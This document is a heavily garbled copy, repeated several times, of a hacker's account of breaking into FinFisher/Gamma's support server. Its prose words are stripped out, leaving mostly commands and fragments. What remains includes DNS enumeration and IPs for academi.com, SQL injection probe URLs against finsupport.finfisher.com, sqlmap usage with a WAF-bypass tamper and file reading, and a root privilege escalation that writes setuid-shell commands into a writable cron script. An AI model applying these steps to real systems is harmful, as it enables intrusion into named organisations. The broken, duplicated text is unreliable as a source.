The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
